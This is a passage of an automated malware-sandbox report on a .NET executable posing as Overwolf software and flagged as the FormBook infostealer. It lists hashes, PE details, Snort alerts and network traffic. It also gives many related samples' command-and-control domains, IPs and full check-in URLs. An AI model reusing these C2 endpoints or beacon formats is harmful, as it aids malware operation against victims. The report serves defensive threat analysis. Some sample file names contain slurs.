                                                    • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    20:58:32API Interceptor1x Sleep call for process: GV8EJooYMIgEnEk.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    46.252.151.2354tWrWVF8FkB9IrJ.exeGet hashmaliciousBrowse
                                                    • www.webarate.com/cbgo/?l8RhI=VbK7p5/Psggo5il9xuntrOblkxMgyefKv0q9dUSV2BUvDbIL0wjBNNoUnAlp8tRmHUdK&9rH08l=06AlVHfhCxC
                                                    166.88.62.202InfoDoc-TGT23.xlsxGet hashmaliciousBrowse
                                                    • www.eardrum.xyz/e9gd/?kbMpZrx=b+9jsf+ELGQrWImFv82xcfcAa785fdj1fxma6mIbMrTU4ZCeo+U+9wgFtJNsIWBgyQOLtA==&1b=iHN83
                                                    199.59.243.2004tWrWVF8FkB9IrJ.exeGet hashmaliciousBrowse
                                                    • www.totalwinerewards.com/cbgo/?l8RhI=1bX869aeBvRpB8efE68exBqREj8ZtAjUgPjKFGRzRfZzNr9ae7mwrEXk0/ZD8RpqTQtr&9rH08l=06AlVHfhCxC
                                                    payment advice_008900112.exeGet hashmaliciousBrowse
                                                    • www.serviciopersonalizadoweb.com/cxep/?B2=SIFOkOtnxU3r+H3QW2X/5C6dvQ0UZ8ek0clsIMOibamXT/NWg9zJX4iPcY0TKxv0c5BT&m64=LHcPZ
                                                    Re Nuovo ordine.xlsxGet hashmaliciousBrowse
                                                    • www.trovatoproperty.com/h0id/?4hm0=AKERkAky+bJcW3+UnwRnTBgPYewHphejt+h78iWAa1IaBrmzs/dKcez8pkqlRmhshZPgkA==&CBZhV=Ilut_Nfx
                                                    Swift Copy20222601.PDF.exeGet hashmaliciousBrowse
                                                    • www.altijdstoer.info/pout/?m48XW=-ZPhYhsh&5jod7=xQ+z/VGu4Asmn0Aik4xQ0bMH/jBlf9sFiid0xhNxTdUUQZVVO6IyZydQsaprzSlG3kUd
                                                    RHC-22-2148.xlsxGet hashmaliciousBrowse
                                                    • www.mnbvending.com/nk6l/?bzrDP=lWJ0+4EUbBQ6u66sUdoa14OozYOI2qGTtHLqyOm/xr5FEzr6J1v2hWDNXFSDyqetJs97Dg==&0fX=RrzDsHoP36
                                                    Statement of Account.xlsxGet hashmaliciousBrowse
                                                    • www.ballerapeclub.digital/u6vb/?u0=XnRreWDab7hnq/H4zIdTOCmTYBjad9QzAZ4/yq5mlBOh5Nh1YdLL88R44iN5d6HlwikwbA==&6loxu=nr-d-tJXLZUxR
                                                    73z0Vr7p1b.exeGet hashmaliciousBrowse
                                                    • ww1.survey-smiles.com/
                                                    Invoice_xls.exeGet hashmaliciousBrowse
                                                    • www.phhmrotgage.com/3a4h/?P8MpC2kH=kLaK0znRIb5H+cZsNFsX5uMT1+LdMDd1onVviTb1BZWLelS3rDAG/c+iar0NVh+GsJRR&8pW0=E49pbFkxZbO8
                                                    Package Details.exeGet hashmaliciousBrowse
                                                    • www.60thstreetdesserts.com/rexd/?3fF0v=trJ0syaN7gjrIFVpwVeKxS2UbkLF/xQbDhr4XJir5g/mNAgmYk023tJGbQa22K5Af+A0&6lMXu=f2JHEzOxJH7DnJop
                                                    Quotation #3200025006.exeGet hashmaliciousBrowse
                                                    • www.realbeaches.com/mwfc/?5jVDGz=6UIEUR1lJfHn4MUwbu4vCAEP5PgegHCvUqOSO78WJ/VTmzvL8u5uXiJf4AZotWYHzK2P4kDE5w==&y0Dl9=-Z_l
                                                    fu3sfo8XGK.exeGet hashmaliciousBrowse
                                                    • ww1.survey-smiles.com/
                                                    commercial invoice_010202201.exeGet hashmaliciousBrowse
                                                    • www.sfcshavedice.com/igwa/?JXRL2Htp=iLZ1RFWiw0U4S9E0pDZlJcjoptUhYXlNWk90HzYHcuVmRCYph1Gowzt+bYvcpjSVMV+b&2dyD8R=k0GL
                                                    sDvicZVIuo.exeGet hashmaliciousBrowse
                                                    • www.lifechangescoaching.com/d2z8/?j6=DYXaMO2Q1JjG+okz2XPRHgzBVPm0wY/vx38ecOWc187kBVViIZKYqMYT9xh0wvnrm2aE&2duD=FBZLitgXaF
                                                    RFQ-2201747.xlsxGet hashmaliciousBrowse
                                                    • www.mnbvending.com/nk6l/?_zudwl=z0Dhy050e6x&3frLpJ=lWJ0+4EUbBQ6u66sUdoa14OozYOI2qGTtHLqyOm/xr5FEzr6J1v2hWDNXFSDyqetJs97Dg==
                                                    DEC SOA_09012022.exeGet hashmaliciousBrowse
                                                    • www.sfcshavedice.com/igwa/?NDK05LDp=iLZ1RFWiw0U4S9E0pDZlJcjoptUhYXlNWk90HzYHcuVmRCYph1Gowzt+bYvcpjSVMV+b&g48l=XV3pgJrpwxFtE2m0
                                                    PO#0065021.pdf.exeGet hashmaliciousBrowse
                                                    • www.inchimica.com/nid3/?5jjHa=XCoRQBxtVX+pu/atCSP8fwNgqX7A8XPSdZowO+Za9fgQEhugCuOAraKGyo2ivK0HXmCj&6l9tXL=r0DxCXC0Z4u08xY
                                                    remotesystemstempfiles.exeGet hashmaliciousBrowse
                                                    • h1.ripway.com/asdb050/setting.ini
                                                    0rder_pdf.exeGet hashmaliciousBrowse
                                                    • www.referral.center/mawd/?5jQ=xk9oCD9hRe4E4XNgY3ykQEnPUYnMgjRwfbBqMbYf13cUTqFfOYUINloM/NT5WBuwbGK+&j48p3N=SBZDOzghsZdL
                                                    Scan_Doc.exeGet hashmaliciousBrowse
                                                    • www.cozastore.net/md4m/?1bTHU2H=zGq3yEf7lcuO6uIhGaDQJ79zxPTM2BPB7pQMpYajJTbsUEONuz37UcdJsc84WbjCn/cW&m6=TBMXHzZHlNv
                                                    2NU3hgMIz7.exeGet hashmaliciousBrowse
                                                    • www.cotchildcare.com/fqiq/?2dcP5LD=OmCJUEnVI8SLVkm/PKp9U0DomyEu2+yoRYOnC/nCXmJZr1+t5jYzlJUIeB+ZwX07RFtf&CL30v=BHvl8Va0FR1H

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    www.totalwinerewards.com4tWrWVF8FkB9IrJ.exeGet hashmaliciousBrowse
                                                    • 199.59.243.200

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    EGIHOSTINGUSNoua lista de comenzi.exeGet hashmaliciousBrowse
                                                    • 172.120.156.91
                                                    2t9KtoR9xzpJY4E.exeGet hashmaliciousBrowse
                                                    • 107.186.145.25
                                                    SSH.arm7Get hashmaliciousBrowse
                                                    • 45.39.166.100
                                                    Hq7kAxeOwBGet hashmaliciousBrowse
                                                    • 166.93.166.38
                                                    SHIPPPING-DOC.xlsxGet hashmaliciousBrowse
                                                    • 107.164.136.91
                                                    iEHPW6Z5kt.exeGet hashmaliciousBrowse
                                                    • 23.27.137.77
                                                    DHLAWB9678547836.exeGet hashmaliciousBrowse
                                                    • 166.88.201.53
                                                    fkOdqDZAvp.exeGet hashmaliciousBrowse
                                                    • 107.186.145.224
                                                    jAgPloGkI8Get hashmaliciousBrowse
                                                    • 172.120.223.162
                                                    Booking number 63200IN437668.exeGet hashmaliciousBrowse
                                                    • 107.186.145.131
                                                    scan097890.exeGet hashmaliciousBrowse
                                                    • 104.164.76.51
                                                    g03hq978TKGet hashmaliciousBrowse
                                                    • 172.120.117.138
                                                    Rubify.m68kGet hashmaliciousBrowse
                                                    • 172.120.223.198
                                                    Rubify.mpslGet hashmaliciousBrowse
                                                    • 172.98.191.22
                                                    Rubify.mipsGet hashmaliciousBrowse
                                                    • 172.121.224.7
                                                    Rubify.armGet hashmaliciousBrowse
                                                    • 172.98.191.63
                                                    EGbDLRwaLAGet hashmaliciousBrowse
                                                    • 166.93.191.10
                                                    arm7Get hashmaliciousBrowse
                                                    • 107.164.180.8
                                                    FIGta9W6JrGet hashmaliciousBrowse
                                                    • 192.177.143.75
                                                    DHL Shipment doc.exeGet hashmaliciousBrowse
                                                    • 45.38.63.236
                                                    ASSUPERNOVAIT4tWrWVF8FkB9IrJ.exeGet hashmaliciousBrowse
                                                    • 46.252.151.235
                                                    DT6W7FeJQ8.dllGet hashmaliciousBrowse
                                                    • 86.107.98.232
                                                    h5amYsvg7b.dllGet hashmaliciousBrowse
                                                    • 86.107.98.232
                                                    DT6W7FeJQ8.dllGet hashmaliciousBrowse
                                                    • 86.107.98.232
                                                    h5amYsvg7b.dllGet hashmaliciousBrowse
                                                    • 86.107.98.232
                                                    qUsXbMVlAKXspddcuntfuck.dllGet hashmaliciousBrowse
                                                    • 86.107.98.232
                                                    CLJJkWORzpshekniggagook.dllGet hashmaliciousBrowse
                                                    • 86.107.98.232
                                                    qUsXbMVlAKXspddcuntfuck.dllGet hashmaliciousBrowse
                                                    • 86.107.98.232
                                                    CLJJkWORzpshekniggagook.dllGet hashmaliciousBrowse
                                                    • 86.107.98.232
                                                    SecuriteInfo.com.Suspicious.Win32.Save.a.25372.dllGet hashmaliciousBrowse
                                                    • 86.107.98.232
                                                    SecuriteInfo.com.Suspicious.Win32.Save.a.5021.dllGet hashmaliciousBrowse
                                                    • 86.107.98.232
                                                    SecuriteInfo.com.Drixed-FJX6F3C95432563.16512.dllGet hashmaliciousBrowse
                                                    • 86.107.98.232
                                                    SecuriteInfo.com.Suspicious.Win32.Save.a.25372.dllGet hashmaliciousBrowse
                                                    • 86.107.98.232
                                                    SecuriteInfo.com.Suspicious.Win32.Save.a.5021.dllGet hashmaliciousBrowse
                                                    • 86.107.98.232
                                                    SecuriteInfo.com.Drixed-FJX6F3C95432563.16512.dllGet hashmaliciousBrowse
                                                    • 86.107.98.232
                                                    SecuriteInfo.com.Trojan.Dridex.777.1092.dllGet hashmaliciousBrowse
                                                    • 86.107.98.232
                                                    SecuriteInfo.com.W32.AIDetect.malware2.14830.dllGet hashmaliciousBrowse
                                                    • 86.107.98.232
                                                    SecuriteInfo.com.Trojan.Dridex.777.11111.dllGet hashmaliciousBrowse
                                                    • 86.107.98.232
                                                    SecuriteInfo.com.Drixed-FJX711484C49629.8239.dllGet hashmaliciousBrowse
                                                    • 86.107.98.232
                                                    SecuriteInfo.com.Suspicious.Win32.Save.a.26972.dllGet hashmaliciousBrowse
                                                    • 86.107.98.232

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GV8EJooYMIgEnEk.exe.log

                                                    Download File
                                                    Process:C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1216
                                                    Entropy (8bit):5.355304211458859
                                                    Encrypted:false
                                                    SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                    MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                    SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                    SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                    SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                    Malicious:true
                                                    Reputation:high, very likely benign file
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):7.768784179337575
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    • DOS Executable Generic (2002/1) 0.01%
                                                    File name:GV8EJooYMIgEnEk.exe
                                                    File size:391680
                                                    MD5:cf6d4fd3dc8e4751b7f89f857b618ef3
                                                    SHA1:15b95f0f1b5785bb7fd3d97757f3eea49d1f6951
                                                    SHA256:9689e8e0cf51b8b5c98ddb007636d8acf7e03c9cc8a7bf99aafdaaebae2dfb3a
                                                    SHA512:86af327caf1d55c8d3dd1e2319dcae1faaf7db82fb2fdce83999b0a4e5c6af2ce700fb0c69f568169110f04b9af6543e069aee59101370d6af060d8d4763d43f
                                                    SSDEEP:6144:7qy0O+Q45IX8LhyTaFwZCpZpwhTvQJWpLcbK8lpmybOVbGmb0Xj/9JnQiypM7Jz8:7HgwZIjwxvwCLc9pHbOVLgXjLQiypM7
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...._.a............................>.... ... ....@.. .......................`............@................................

                                                    File Icon

                                                    Icon Hash:00828e8e8686b000

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x460d3e
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                    Time Stamp:0x61F25F83 [Thu Jan 27 09:01:55 2022 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:v4.0.30319
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                    Entrypoint Preview

                                                    Instruction
                                                    jmp dword ptr [00402000h]
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x60cf00x4b.text
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x620000x61c.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x640000xc.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x60c960x1c.text
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x20000x5ed440x5ee00False0.88598793643data7.78260076892IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                    .rsrc0x620000x61c0x800False0.32568359375data3.4603762807IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc0x640000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    NameRVASizeTypeLanguageCountry
                                                    RT_VERSION0x620a00x38edata
                                                    RT_MANIFEST0x624300x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                    Imports

                                                    DLLImport
                                                    mscoree.dll_CorExeMain

                                                    Version Infos

                                                    DescriptionData
                                                    Translation0x0000 0x04b0
                                                    LegalCopyrightCopyright Overwolf 2021
                                                    Assembly Version11.0.0.0
                                                    InternalNameStructuralEqualityCompar.exe
                                                    FileVersion11.0.0.0
                                                    CompanyNameOverwolf LTD
                                                    LegalTrademarks
                                                    Comments
                                                    ProductNameOverwolf
                                                    ProductVersion11.0.0.0
                                                    FileDescriptionOverwolf
                                                    OriginalFilenameStructuralEqualityCompar.exe

                                                    Network Behavior

                                                    Snort IDS Alerts

                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                    01/28/22-20:59:48.188612TCP2031453ET TROJAN FormBook CnC Checkin (GET)4981780192.168.2.3199.59.243.200
                                                    01/28/22-20:59:48.188612TCP2031449ET TROJAN FormBook CnC Checkin (GET)4981780192.168.2.3199.59.243.200
                                                    01/28/22-20:59:48.188612TCP2031412ET TROJAN FormBook CnC Checkin (GET)4981780192.168.2.3199.59.243.200
                                                    01/28/22-20:59:53.555000TCP1201ATTACK-RESPONSES 403 Forbidden804981934.102.136.180192.168.2.3
                                                    01/28/22-20:59:59.099003TCP2031453ET TROJAN FormBook CnC Checkin (GET)4982080192.168.2.318.231.72.25
                                                    01/28/22-20:59:59.099003TCP2031449ET TROJAN FormBook CnC Checkin (GET)4982080192.168.2.318.231.72.25
                                                    01/28/22-20:59:59.099003TCP2031412ET TROJAN FormBook CnC Checkin (GET)4982080192.168.2.318.231.72.25
                                                    01/28/22-21:00:09.463600TCP2031453ET TROJAN FormBook CnC Checkin (GET)4982180192.168.2.334.102.136.180
                                                    01/28/22-21:00:09.463600TCP2031449ET TROJAN FormBook CnC Checkin (GET)4982180192.168.2.334.102.136.180
                                                    01/28/22-21:00:09.463600TCP2031412ET TROJAN FormBook CnC Checkin (GET)4982180192.168.2.334.102.136.180
                                                    01/28/22-21:00:09.578330TCP1201ATTACK-RESPONSES 403 Forbidden804982134.102.136.180192.168.2.3

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jan 28, 2022 20:59:42.798983097 CET4981680192.168.2.3166.88.62.202
                                                    Jan 28, 2022 20:59:42.965682030 CET8049816166.88.62.202192.168.2.3
                                                    Jan 28, 2022 20:59:42.965822935 CET4981680192.168.2.3166.88.62.202
                                                    Jan 28, 2022 20:59:42.965996981 CET4981680192.168.2.3166.88.62.202
                                                    Jan 28, 2022 20:59:43.132395983 CET8049816166.88.62.202192.168.2.3
                                                    Jan 28, 2022 20:59:43.132538080 CET8049816166.88.62.202192.168.2.3
                                                    Jan 28, 2022 20:59:43.132555962 CET8049816166.88.62.202192.168.2.3
                                                    Jan 28, 2022 20:59:43.132710934 CET4981680192.168.2.3166.88.62.202
                                                    Jan 28, 2022 20:59:43.132930994 CET4981680192.168.2.3166.88.62.202
                                                    Jan 28, 2022 20:59:43.299249887 CET8049816166.88.62.202192.168.2.3
                                                    Jan 28, 2022 20:59:48.170636892 CET4981780192.168.2.3199.59.243.200
                                                    Jan 28, 2022 20:59:48.188353062 CET8049817199.59.243.200192.168.2.3
                                                    Jan 28, 2022 20:59:48.188462973 CET4981780192.168.2.3199.59.243.200
                                                    Jan 28, 2022 20:59:48.188611984 CET4981780192.168.2.3199.59.243.200
                                                    Jan 28, 2022 20:59:48.206522942 CET8049817199.59.243.200192.168.2.3
                                                    Jan 28, 2022 20:59:48.386589050 CET8049817199.59.243.200192.168.2.3
                                                    Jan 28, 2022 20:59:48.386617899 CET8049817199.59.243.200192.168.2.3
                                                    Jan 28, 2022 20:59:48.386630058 CET8049817199.59.243.200192.168.2.3
                                                    Jan 28, 2022 20:59:48.386801958 CET4981780192.168.2.3199.59.243.200
                                                    Jan 28, 2022 20:59:48.386905909 CET4981780192.168.2.3199.59.243.200
                                                    Jan 28, 2022 20:59:48.404725075 CET8049817199.59.243.200192.168.2.3
                                                    Jan 28, 2022 20:59:53.420916080 CET4981980192.168.2.334.102.136.180
                                                    Jan 28, 2022 20:59:53.439260006 CET804981934.102.136.180192.168.2.3
                                                    Jan 28, 2022 20:59:53.439475060 CET4981980192.168.2.334.102.136.180
                                                    Jan 28, 2022 20:59:53.439712048 CET4981980192.168.2.334.102.136.180
                                                    Jan 28, 2022 20:59:53.457967043 CET804981934.102.136.180192.168.2.3
                                                    Jan 28, 2022 20:59:53.555000067 CET804981934.102.136.180192.168.2.3
                                                    Jan 28, 2022 20:59:53.555032969 CET804981934.102.136.180192.168.2.3
                                                    Jan 28, 2022 20:59:53.555290937 CET4981980192.168.2.334.102.136.180
                                                    Jan 28, 2022 20:59:53.555388927 CET4981980192.168.2.334.102.136.180
                                                    Jan 28, 2022 20:59:53.859774113 CET4981980192.168.2.334.102.136.180
                                                    Jan 28, 2022 20:59:53.878108025 CET804981934.102.136.180192.168.2.3
                                                    Jan 28, 2022 20:59:58.644171000 CET4982080192.168.2.318.231.72.25
                                                    Jan 28, 2022 20:59:58.877240896 CET804982018.231.72.25192.168.2.3
                                                    Jan 28, 2022 20:59:58.879684925 CET4982080192.168.2.318.231.72.25
                                                    Jan 28, 2022 20:59:59.099003077 CET4982080192.168.2.318.231.72.25
                                                    Jan 28, 2022 20:59:59.332000017 CET804982018.231.72.25192.168.2.3
                                                    Jan 28, 2022 20:59:59.332036972 CET804982018.231.72.25192.168.2.3
                                                    Jan 28, 2022 20:59:59.332056046 CET804982018.231.72.25192.168.2.3
                                                    Jan 28, 2022 20:59:59.332253933 CET4982080192.168.2.318.231.72.25
                                                    Jan 28, 2022 20:59:59.332340002 CET4982080192.168.2.318.231.72.25
                                                    Jan 28, 2022 20:59:59.565438032 CET804982018.231.72.25192.168.2.3
                                                    Jan 28, 2022 21:00:09.447079897 CET4982180192.168.2.334.102.136.180
                                                    Jan 28, 2022 21:00:09.463361025 CET804982134.102.136.180192.168.2.3
                                                    Jan 28, 2022 21:00:09.463465929 CET4982180192.168.2.334.102.136.180
                                                    Jan 28, 2022 21:00:09.463599920 CET4982180192.168.2.334.102.136.180
                                                    Jan 28, 2022 21:00:09.479799986 CET804982134.102.136.180192.168.2.3
                                                    Jan 28, 2022 21:00:09.578330040 CET804982134.102.136.180192.168.2.3
                                                    Jan 28, 2022 21:00:09.578351974 CET804982134.102.136.180192.168.2.3
                                                    Jan 28, 2022 21:00:09.578561068 CET4982180192.168.2.334.102.136.180
                                                    Jan 28, 2022 21:00:09.578629971 CET4982180192.168.2.334.102.136.180
                                                    Jan 28, 2022 21:00:09.876754999 CET4982180192.168.2.334.102.136.180
                                                    Jan 28, 2022 21:00:09.895001888 CET804982134.102.136.180192.168.2.3
                                                    Jan 28, 2022 21:00:14.659136057 CET4982280192.168.2.346.252.151.235
                                                    Jan 28, 2022 21:00:17.671350956 CET4982280192.168.2.346.252.151.235
                                                    Jan 28, 2022 21:00:23.671860933 CET4982280192.168.2.346.252.151.235

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jan 28, 2022 20:59:42.674398899 CET5265053192.168.2.38.8.8.8
                                                    Jan 28, 2022 20:59:42.790488005 CET53526508.8.8.8192.168.2.3
                                                    Jan 28, 2022 20:59:48.145526886 CET6329753192.168.2.38.8.8.8
                                                    Jan 28, 2022 20:59:48.169529915 CET53632978.8.8.8192.168.2.3
                                                    Jan 28, 2022 20:59:53.396126986 CET5361553192.168.2.38.8.8.8
                                                    Jan 28, 2022 20:59:53.419476032 CET53536158.8.8.8192.168.2.3
                                                    Jan 28, 2022 20:59:58.609788895 CET5072853192.168.2.38.8.8.8
                                                    Jan 28, 2022 20:59:58.638331890 CET53507288.8.8.8192.168.2.3
                                                    Jan 28, 2022 21:00:04.353455067 CET5377753192.168.2.38.8.8.8
                                                    Jan 28, 2022 21:00:04.394292116 CET53537778.8.8.8192.168.2.3
                                                    Jan 28, 2022 21:00:09.424981117 CET5710653192.168.2.38.8.8.8
                                                    Jan 28, 2022 21:00:09.445676088 CET53571068.8.8.8192.168.2.3
                                                    Jan 28, 2022 21:00:14.622612000 CET6035253192.168.2.38.8.8.8
                                                    Jan 28, 2022 21:00:14.657841921 CET53603528.8.8.8192.168.2.3

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                    Jan 28, 2022 20:59:42.674398899 CET192.168.2.38.8.8.80x48c8Standard query (0)www.experiencedlawfirms.comA (IP address)IN (0x0001)
                                                    Jan 28, 2022 20:59:48.145526886 CET192.168.2.38.8.8.80xf74dStandard query (0)www.totalwinerewards.comA (IP address)IN (0x0001)
                                                    Jan 28, 2022 20:59:53.396126986 CET192.168.2.38.8.8.80x2129Standard query (0)www.casatowerofficial.comA (IP address)IN (0x0001)
                                                    Jan 28, 2022 20:59:58.609788895 CET192.168.2.38.8.8.80x2e9bStandard query (0)www.bitconga.comA (IP address)IN (0x0001)
                                                    Jan 28, 2022 21:00:04.353455067 CET192.168.2.38.8.8.80x72a8Standard query (0)www.tothelaundry.comA (IP address)IN (0x0001)
